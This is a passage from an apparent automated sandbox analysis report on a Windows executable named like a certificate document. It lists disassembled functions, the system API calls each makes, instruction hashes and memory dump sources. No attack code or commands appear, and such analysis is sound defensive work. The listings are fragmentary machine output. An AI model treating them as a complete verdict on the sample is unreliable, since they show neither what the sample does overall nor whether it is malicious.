                                                                                • Instruction ID: c72afb055b87ac9ae8d43e3f0223681a35e03aebea7bfa77cc42ee6fc671a2e7
                                                                                • Opcode Fuzzy Hash: cb63b934232d6c536da32af7a8785f625a347d31789ac45ea1a5e516db88f9ae
                                                                                • Instruction Fuzzy Hash: E0216671A001249FCB11AF69C885E9EBBFCFF4A350F04416AF849D7251DB749E458F91
                                                                                Function 00880AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00881E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00880ABB,?,?,?,0088187A,00000000,000000EF,00000119,?,?), ref: 00881E77
                                                                                  • Part of subcall function 00881E68: lstrcpyW.KERNEL32(00000000,?,?,00880ABB,?,?,?,0088187A,00000000,000000EF,00000119,?,?,00000000), ref: 00881E9D
                                                                                  • Part of subcall function 00881E68: lstrcmpiW.KERNEL32(00000000,?,00880ABB,?,?,?,0088187A,00000000,000000EF,00000119,?,?), ref: 00881ECE
                                                                                • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0088187A,00000000,000000EF,00000119,?,?,00000000), ref: 00880AD4
                                                                                • lstrcpyW.KERNEL32(00000000,?,?,0088187A,00000000,000000EF,00000119,?,?,00000000), ref: 00880AFA
                                                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,0088187A,00000000,000000EF,00000119,?,?,00000000), ref: 00880B2E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: lstrcmpilstrcpylstrlen
                                                                                • String ID: cdecl
                                                                                • API String ID: 4031866154-3896280584
                                                                                • Opcode ID: 539ef1deb81c7fdbeb62a44fd0f27b7df5977c6af67a0e082bb3bc82c8ca8eae
                                                                                • Instruction ID: 555b8aa1162bfa25bc6b5c8ccad3d5add158d9f6dd4ff51455b979fb23497acb
                                                                                • Opcode Fuzzy Hash: 539ef1deb81c7fdbeb62a44fd0f27b7df5977c6af67a0e082bb3bc82c8ca8eae
                                                                                • Instruction Fuzzy Hash: 86118136200305AFDB25BF34DC45D7A77B8FF45364B80416AE906CB250EB71A855CBA1
                                                                                Function 00872F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _free.LIBCMT ref: 00872FB5
                                                                                  • Part of subcall function 0086395C: __FF_MSGBANNER.LIBCMT ref: 00863973
                                                                                  • Part of subcall function 0086395C: __NMSG_WRITE.LIBCMT ref: 0086397A
                                                                                  • Part of subcall function 0086395C: RtlAllocateHeap.NTDLL(00C60000,00000000,00000001,00000001,00000000,?,?,0085F507,?,0000000E), ref: 0086399F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap_free
                                                                                • String ID:
                                                                                • API String ID: 614378929-0
                                                                                • Opcode ID: 94e41ee99c6174c52a1d09452ac3d1245645ed3addef1ceedbf5dfd09129e936
                                                                                • Instruction ID: e6343694d1df1e159e194c0e0b0ac48bd1ab0cc18e40f5d77196bbce1164a76b
                                                                                • Opcode Fuzzy Hash: 94e41ee99c6174c52a1d09452ac3d1245645ed3addef1ceedbf5dfd09129e936
                                                                                • Instruction Fuzzy Hash: D9110632409616AFCF313B78AC0566A3BA4FF00364F21C825F85DDA155DF35C940AAD2
                                                                                Function 0088058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 008805AC
                                                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 008805C7
                                                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 008805DD
                                                                                • FreeLibrary.KERNEL32(?), ref: 00880632
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                • String ID:
                                                                                • API String ID: 3137044355-0
                                                                                • Opcode ID: 28ba095dab25a42740f402f75914596a649aa2a1f3d09157b2ec67eff74bb18b
                                                                                • Instruction ID: db99ff7021219a4a335876bd2873a1831c2ed6e372171988a70e4cd6771b9244
                                                                                • Opcode Fuzzy Hash: 28ba095dab25a42740f402f75914596a649aa2a1f3d09157b2ec67eff74bb18b
                                                                                • Instruction Fuzzy Hash: 1821AC7194030AEFEB60EF94DC88ADABBB8FF50304F00846AE516D6110E770EA58DF60
                                                                                Function 00886713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00886733
                                                                                • _memset.LIBCMT ref: 00886754
                                                                                • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 008867A6
                                                                                • CloseHandle.KERNEL32(00000000), ref: 008867AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                • String ID:
                                                                                • API String ID: 1157408455-0
                                                                                • Opcode ID: e5ae460bf705edd06e19cbca430216e38628bd9450bda242531ba955db3978cf
                                                                                • Instruction ID: 320722da220b3f424e7901772feda5f7bffd1b83a27022fdc410668e888aaacd
                                                                                • Opcode Fuzzy Hash: e5ae460bf705edd06e19cbca430216e38628bd9450bda242531ba955db3978cf
                                                                                • Instruction Fuzzy Hash: 55110A729012287AE72077A5AC4DFABBABCFF44764F1042AAF504E71C0D2705E808BA4
                                                                                Function 0087B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0087AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0087AA79
                                                                                  • Part of subcall function 0087AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0087AA83
                                                                                  • Part of subcall function 0087AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0087AA92
                                                                                  • Part of subcall function 0087AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0087AA99
                                                                                  • Part of subcall function 0087AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0087AAAF
                                                                                • GetLengthSid.ADVAPI32(?,00000000,0087ADE4,?,?), ref: 0087B21B
                                                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0087B227
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0087B22E
                                                                                • CopySid.ADVAPI32(?,00000000,?), ref: 0087B247
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                                • String ID:
                                                                                • API String ID: 4217664535-0
                                                                                • Opcode ID: b74023975fd034c60dbb81144f7bc83f123d69931829746f412328121e5493a6
                                                                                • Instruction ID: b53fb32d81badca84c43984085e8c2da71ca33fc2d641f759cfcae92a4e01bc1
                                                                                • Opcode Fuzzy Hash: b74023975fd034c60dbb81144f7bc83f123d69931829746f412328121e5493a6
                                                                                • Instruction Fuzzy Hash: 42119D71A11205AFCB04AF98CC84BAEB7BAFF85304B14806DE946D7215D731EE44CB10
                                                                                Function 0087B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0087B498
                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0087B4AA
                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0087B4C0
                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0087B4DB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: c2eeb6b666ed4322822deb00fbc0692c5ff48f527d99567c310d5100348cf303
                                                                                • Instruction ID: ffe661b01407b32201d3c080e2df9ace47b19ca2d972fa688e05afff6191f0e5
                                                                                • Opcode Fuzzy Hash: c2eeb6b666ed4322822deb00fbc0692c5ff48f527d99567c310d5100348cf303
                                                                                • Instruction Fuzzy Hash: 3811487A900218FFDB11DFA8C881F9DBBB5FB08700F208091E604B7294D771AE10DB94
                                                                                Function 0085B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0085B34E: GetWindowLongW.USER32(?,000000EB), ref: 0085B35F
                                                                                • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0085B5A5
                                                                                • GetClientRect.USER32(?,?), ref: 008BE69A
                                                                                • GetCursorPos.USER32(?), ref: 008BE6A4
                                                                                • ScreenToClient.USER32(?,?), ref: 008BE6AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Client$CursorLongProcRectScreenWindow
                                                                                • String ID:
                                                                                • API String ID: 4127811313-0
                                                                                • Opcode ID: 2624a95c35aeeaf3d43aacee92ad4f5e59e5d4b053a0149c74eafafaf55b47b3
                                                                                • Instruction ID: a952b1b327b6f352f253d9ba11f78b939effc8605cda278d1784f87486711592
                                                                                • Opcode Fuzzy Hash: 2624a95c35aeeaf3d43aacee92ad4f5e59e5d4b053a0149c74eafafaf55b47b3
                                                                                • Instruction Fuzzy Hash: 01111835900129BFDB14EF98DC45DEE77B9FB29305F100455F902E7241E734AA95CBA1
                                                                                Function 0088732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00887352
                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 00887385
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0088739B
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 008873A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                • String ID:
                                                                                • API String ID: 2880819207-0
                                                                                • Opcode ID: 47ec2d2fe3f53640818277fcdd5cbb94b67b778d0436507f6b23e436458a1837
                                                                                • Instruction ID: cbec4875e4e2280d8a9d9f7f395c9c8328653231caa6eea5669b0df2dc2f5ce5
                                                                                • Opcode Fuzzy Hash: 47ec2d2fe3f53640818277fcdd5cbb94b67b778d0436507f6b23e436458a1837
                                                                                • Instruction Fuzzy Hash: D311A172A08204AFD701ABAC9C45E9E7BBDFB45354F144265F935D33A1D770DA0097A1
                                                                                Function 0085D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0085D1BA
                                                                                • GetStockObject.GDI32(00000011), ref: 0085D1CE
                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 0085D1D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CreateMessageObjectSendStockWindow
                                                                                • String ID:
                                                                                • API String ID: 3970641297-0
                                                                                • Opcode ID: c9047b8b2c4c314fa4875a154743365c97978d3da5130ba103f7f90240d0dc8f
                                                                                • Instruction ID: 0317a1b4766f0087869ce60e0f0fea641ac57ba1c47e93f491867956fb6a45ef
                                                                                • Opcode Fuzzy Hash: c9047b8b2c4c314fa4875a154743365c97978d3da5130ba103f7f90240d0dc8f
                                                                                • Instruction Fuzzy Hash: 5411AD72141A09BFEB229F949C50EEABB69FF08365F040116FE1492150C7319C60EBA0
                                                                                Function 00874DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                • String ID:
                                                                                • API String ID: 3016257755-0
                                                                                • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                • Instruction ID: 450ac7595634fd2d7203162a5b6a35fd327cc3aba877fa6a4c41a2b001388b5a
                                                                                • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                • Instruction Fuzzy Hash: 3A014B7300014EBBCF125E88DC018EE3F22FB183A4B589455FA1C99139D336CAB2AB81
                                                                                Function 00867452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00867A0D: __getptd_noexit.LIBCMT ref: 00867A0E
                                                                                • __lock.LIBCMT ref: 0086748F
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 008674AC
                                                                                • _free.LIBCMT ref: 008674BF
                                                                                • InterlockedIncrement.KERNEL32(00C727D0), ref: 008674D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                • String ID:
                                                                                • API String ID: 2704283638-0
                                                                                • Opcode ID: 60b67e8de2a63457a5d8eea311f35942096bb5094bb2440000a998a700f6cfca
                                                                                • Instruction ID: 7d0525e040ca44c130bbf9ee36068f75f07bb2c0aa832221ec9b050f28aaafc1
                                                                                • Opcode Fuzzy Hash: 60b67e8de2a63457a5d8eea311f35942096bb5094bb2440000a998a700f6cfca
                                                                                • Instruction Fuzzy Hash: 50018E329056219BD716AF789409B6DBB60FB04728F164009E418E7680DB249941CFCA
                                                                                Function 00867A94 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __lock.LIBCMT ref: 00867AD8
                                                                                  • Part of subcall function 00867CF4: __mtinitlocknum.LIBCMT ref: 00867D06
                                                                                  • Part of subcall function 00867CF4: EnterCriticalSection.KERNEL32(00000000,?,00867ADD,0000000D), ref: 00867D1F
                                                                                • InterlockedIncrement.KERNEL32(?), ref: 00867AE5
                                                                                • __lock.LIBCMT ref: 00867AF9
                                                                                • ___addlocaleref.LIBCMT ref: 00867B17
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                • String ID:
                                                                                • API String ID: 1687444384-0
                                                                                • Opcode ID: e847cf16f08da988e4a9c76aabbbaef8f607c0f4d30ebfa29b0ca2f71b106227
                                                                                • Instruction ID: 30b3657491cd345d40af43da2d1224fe2f67e80cc20abe5a4afd4c8a950a1ae3
                                                                                • Opcode Fuzzy Hash: e847cf16f08da988e4a9c76aabbbaef8f607c0f4d30ebfa29b0ca2f71b106227
                                                                                • Instruction Fuzzy Hash: 40015B71404B009ED720AF79C90574AB7F0FF54335F21890EA59AD62A0DB74A684CB46
                                                                                Function 008AE32E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 008AE33D
                                                                                • _memset.LIBCMT ref: 008AE34C
                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00903D00,00903D44), ref: 008AE37B
                                                                                • CloseHandle.KERNEL32 ref: 008AE38D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _memset$CloseCreateHandleProcess
                                                                                • String ID:
                                                                                • API String ID: 3277943733-0
                                                                                • Opcode ID: 33d7a60a7da3a4a3278caab7b3d936dbc45494fcab1cd8cd7f978b1c5d2fa46c
                                                                                • Instruction ID: 900b63f899e7b9b99371f02f85adefb0673b59ff5b2742c9095fed1c138069a0
                                                                                • Opcode Fuzzy Hash: 33d7a60a7da3a4a3278caab7b3d936dbc45494fcab1cd8cd7f978b1c5d2fa46c
                                                                                • Instruction Fuzzy Hash: A6F05EF1550314BFE3112B65AC45F777EACEB04754F018521BE08D62E2D3759E0096A9
                                                                                Function 0084EE0D Relevance: 6.0, APIs: 4, Instructions: 32windowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • timeGetTime.WINMM ref: 0084EBFA
                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0084ED9F
                                                                                • TranslateMessage.USER32(?), ref: 008B59F7
                                                                                • DispatchMessageW.USER32(?), ref: 008B5A05
                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008B5A19
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Message$DispatchTimeTranslatetime
                                                                                • String ID:
                                                                                • API String ID: 953213773-0
                                                                                • Opcode ID: 4a6d52b54ad55214fd3c2fb05865f092399adcb80916a8f19f115615e9b998a8
                                                                                • Instruction ID: 12d1a51144683573236a290e4280edb6f28c4bc14464c5cb2f5ab94b214f7584
                                                                                • Opcode Fuzzy Hash: 4a6d52b54ad55214fd3c2fb05865f092399adcb80916a8f19f115615e9b998a8
                                                                                • Instruction Fuzzy Hash: B0F0303260938DDAD720D7A8EC49FDA7BACFB54755F10486BA60AD2040EA34A508C772
                                                                                Function 008AEA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0085AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0085AFE3
                                                                                  • Part of subcall function 0085AF83: SelectObject.GDI32(?,00000000), ref: 0085AFF2
                                                                                  • Part of subcall function 0085AF83: BeginPath.GDI32(?), ref: 0085B009
                                                                                  • Part of subcall function 0085AF83: SelectObject.GDI32(?,00000000), ref: 0085B033
                                                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 008AEA8E
                                                                                • LineTo.GDI32(00000000,?,?), ref: 008AEA9B
                                                                                • EndPath.GDI32(00000000), ref: 008AEAAB
                                                                                • StrokePath.GDI32(00000000), ref: 008AEAB9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
